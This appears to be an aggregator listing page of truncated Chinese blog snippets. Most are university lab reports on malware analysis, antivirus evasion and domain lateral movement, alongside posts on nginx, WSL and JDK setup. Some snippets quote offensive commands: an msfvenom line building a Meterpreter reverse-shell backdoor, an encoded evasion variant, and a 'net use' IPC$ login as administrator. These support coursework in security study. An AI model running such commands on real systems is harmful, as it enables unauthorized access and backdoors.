ICode9

精准搜索请尝试: 精确搜索
  • vue项目部署2022-04-18 17:04:18

    http://nginx.org/en/download.html下载稳定版nginx   放到纯英文目录下   启动nginx(双击nginx.exe或者cmd窗口切换到nginx文件下 输入命令 nginx.exe 或者 start nginx) 直接在浏览器地址栏输入网址 http://localhost:80,回车,出现以下页面说明启动成功。    如果失败报错0.0

  • 实验四 恶意代码分析实践-实验报告-20192422李俊洁2022-04-17 20:00:42

    实验四 恶意代码分析实践 一.实验过程 任务一 恶意代码文件类型标识、脱壳与字符串提取 查看文件类型 接着我们随便查找一个字符串 Windows下输入 find "a" RaDa.exe//查找含有a的字符串 如图可见全是乱码,我们推测是加壳导致的 使用工具PEiD对文件RaDa.exe进行查壳 使用脱壳工

  • 学号20192411何张榕 网络与系统攻防技术》实验4实验报告2022-04-17 19:31:06

    学号20192411何张榕 网络与系统攻防技术》实验4实验报告 目录学号20192411何张榕 网络与系统攻防技术》实验4实验报告1.实验内容2.实验过程2.1 恶意代码文件类型标识、脱壳与字符串提取(1)使用文件格式和类型识别工具,给出rada恶意代码样本的文件格式、运行平台和加壳工具(2)使用超级巡

  • 20192410 2021-2022-2 《网络与系统攻防技术》实验四 恶意代码分析实践 实验报告2022-04-17 17:32:32

    20192410 2021-2022-2 《网络与系统攻防技术》实验四 恶意代码分析实践 实验报告 1.实验内容 1.恶意代码文件类型标识、脱壳与字符串提取 对提供的rada恶意代码样本,进行文件类型识别,脱壳与字符串提取,以获得rada恶意代码的作者 具体操作如下: (1)使用文件格式和类型识别工具,给出rada

  • 20192427李睿智 2021-2022-2 《网络与系统攻防技术》实验四2022-04-17 17:32:10

    20192427 2021-2022-2 《网络与系统攻防技术》实验四 目录20192427 2021-2022-2 《网络与系统攻防技术》实验四一,实验内容二,实验过程任务一:恶意代码文件类型标识、脱壳与字符串提取任务二 使用IDA Pro静态或动态分析crackme1.exe与crakeme2.exe,寻找特定输入,使其能够输出成功信息

  • 20192417 实验四 恶意代码分析与实践2022-04-17 15:34:54

    目录1.实验内容2.实验过程任务一:恶意代码文件类型标识、脱壳与字符串提取任务二:使用IDA Pro静态或动态分析crackme1.exe与crakeme2.exe,寻找特定输入,使其能够输出成功信息。任务三:分析一个自制恶意代码样本rada任务四:取证分析实践3.问题及解决方案4.学习感悟、思考等 1.实验内容 一

  • 域内横向移动基础2022-04-16 22:35:40

    利用Windwos远程连接 IPC IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。 建立IPC连接 有域的话一定得带上 net use \\1.1.1.3\ipc$ /user:w2k3\administrator "1" 输入net use即可看到建立的连接 常用的命令 //映射磁盘到本地 n

  • 网络对抗实验4--恶意代码分析2022-04-16 01:32:43

    实 验 报 告 课程:网络对抗技术 班级:1912      姓名:陈发强      学号:20191206 实验名称:免杀原理         实验日期:2022.4.15 实验目的 监控你自己系统的运行状态,看有没有可疑的程序在运行。 分析一个恶意软件,工具尽量使用原生指令或sysinte

  • Exp4 恶意代码分析2022-04-16 01:02:09

    20191218 Exp4 恶意代码分析 1.实践目标 1.1监控你自己系统的运行状态,看有没有可疑的程序在运行。 1.2分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysinternals,systracer套件。 1.3假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路

  • 20192423 2021-2022-2 《网络与系统攻防技术》实验四实验报告2022-04-14 19:31:49

    20192423 2021-2022-2 《网络与系统攻防技术》实验四实验报告 1.实验内容 一、恶意代码文件类型标识、脱壳与字符串提取 二、使用IDA Pro静态或动态分析crackme1.exe与crakeme2.exe,寻找特定输入,使其能够输出成功信息。 三、分析一个自制恶意代码样本rada,并撰写报告,回答问题 四、取

  • 20192412 2021-2022-2 《网络与系统攻防技术》实验四实验报告2022-04-14 10:02:25

    《网络与系统攻防技术》实验四 恶意代码分析实践 《网络与系统攻防技术》实验四 恶意代码分析实践 实验内容 实验过程 任务一 恶意代码文件类型标识、脱壳与字符串提取 任务二 使用IDA Pro静态或动态分析crackme1.exe与crakeme2.exe,寻找特定输入,使其能够输出成功信息 任务三 分

  • Exp4 恶意代码分析2022-04-13 20:34:58

    目录Exp4 恶意代码分析实践目标实践内容-系统运行监控系统运行监控-计划任务写.bat文件与接收文件脚本文件接收文件创建计划任务查看任务计划设置相应权限等待之后查看数据我们用Excel分析获得的数据导入数据进入文件导入向导第一步进入文件导入向导第二步进入文件导入向导第三步

  • 20192431张潇文 2021-2022-2 《网络与系统攻防技术》实验四实验报告2022-04-13 17:31:48

    实验四 恶意代码分析与实践 任务一 恶意代码文件类型标识 脱壳与字符串提取 1.1 使用文件格式和类型识别工具,给出rada恶意代码样本的文件格式、运行平台和加壳工具 在kali里通过file RaDa.exe查看文件类型,如下图,可以看到它是为MS Windows的80386处理器的一个32位PE可执行文件,而

  • VS2019 远程调试 ASP.NET2022-04-12 15:02:42

    1.下载 Remote Tools for Visual Studio 2019 https://my.visualstudio.com/Downloads?q=visual%20studio%202019&wt.mc_id=o~msft~vscom~older-downloads 2.在服务器上安装 VS_RemoteTools.exe 打开安装后的软件。配置端口号。 3.发布本地代码 使用微软提供的 WebDeploy 工具(其

  • 20192421 2021-2022-2 《网络与系统攻防技术》实验三实验报告2022-04-10 19:34:48

    一、实验内容 1.正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件 veil,加壳工具 使用C + shellcode编程 2.通过组合应用各种技术实现恶意代码免杀 如果成功实现了免杀的,简单语言描述原理,不要截图。与

  • JDK多个版本共存,各自启动对应的JAVA程序2022-04-10 15:02:03

    jdk8与jdk11共存,各自启动对应的java程序 由于已经安装了jdk8,但有些java程序,比如新版Burp需要jdk11以上版本才能正常运行 对于这种情况,怎么样让jdk8与jdk11成为一个问题,网上有比较多的方法,都是大差不差的,都是各自启动对于的java程序。 只不过在配置的时候会出现各种各样的问题。 下

  • 学号20192411 2021-2022-2 《网络与系统攻防技术》实验3实验报告2022-04-10 12:00:27

    学号20192411 2021-2022-2 《网络与系统攻防技术》实验3实验报告 目录学号20192411 2021-2022-2 《网络与系统攻防技术》实验3实验报告1.实验内容2.实验过程2.1 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧2.1.1 正确使用msf编码器,使用msfvenom生成如jar

  • 20192410 2021-2022-2 《网络与系统攻防技术》实验三 免杀原理与实践 实验报告2022-04-09 21:01:49

    20192410 2021-2022-2 《网络与系统攻防技术》实验三 免杀原理与实践 实验报告 1.实验内容 (1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件 veil,加壳工具 使用C + shellcode编程 (2)通过组合应

  • python筛选excel内容并生成exe文件2022-04-08 11:33:57

    最近疫情原因,班级每天都要筛选未打卡人员,每次都手动操作太麻烦了。遂写下如下的程序,并且生成了exe可执行文件。 1. 主程序 import openpyxl import pyperclip # 1.加载excel表 path="C:/Users/18768/Desktop/导出数据.xlsx" #此处填写excel存放地址,我是放到桌面了。 workbook = o

  • Exp3-免杀原理2022-04-07 17:34:34

    Exp3-免杀原理 基础问题回答 (1)杀软是如何检测出恶意代码的? 杀软工程师将一些恶意软件提取特征码发布到病毒库中,用户更新病毒库就相当于更新了特征码库。 杀毒软件在杀毒过程中把当前检测样本文件特征码与病毒库中病毒特征码进行比对,特征码相同则报毒并且查杀,否则进行更多的处理。

  • Exp3-免杀原理2022-04-07 14:34:28

    20191218 Exp3-免杀原理 实验过程 一、正确使用msf编码器、msfvenom生成如jar之类的其他文件 免杀检测 参考实验二Exp2-后门原理与实践中的第三个小实验,在Kali上用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.141 LPORT=1218 -f exe > 20191218_backdoor.exe

  • 微信双开的方法2022-04-07 09:33:51

    使用批处理程序 新建一个文本文档,将txt的后缀名改为bat的批处理文件。然后在批处理文件中输入以下代码 D: set path="D:\Program Files (x86)\Tencent\WeChat\" start WeChat.exe start WeChat.exe 这是批处理的代码,第一行D是代表微信安装在D盘。第二行是微信安装路径。第三行,第

  • WSL使用说明2022-04-06 16:01:36

      一、 资源管理器切换 1. windows资源管理器中打开(linux目录) \\wsl$ 或者直接执行: explorer.exe . # 注意后缀.exe 2. linux查看windows目录 cd /mnt  二、 设置WSL2最大内存 在C:\Users\%UserName%目录下,新增.wslconfig文件 [wsl2] processors=4 memory=4GB swap=0

  • Exp3-免杀原理与实践2022-04-06 13:01:37

    Exp3-免杀原理 姓名:徐海文     学号:20191228    课程:网络对抗技术 一、基础问题回答 1.杀软是如何检测出恶意代码的? (1)基于特征码的检测 特征码是能识别一个程序是一个病毒的一段不大于64字节的特征串。如果一个可执行文件包含这样的特征码则被杀毒软件检测为是恶意代码。 (2)启

  • EXP3-免杀原理与实践2022-04-05 21:01:44

    基础问题问答 1.1 杀软是如何检测出恶意代码的? 1.2 免杀是做什么? 1.3 免杀的基本方法有哪些? 实践内容 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件 检测直接生成的后门exe文件(实验二中的后门程序) 检出率为54/70 使用Unicode编码 msfvenom -p windows/meterpreter/reve

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有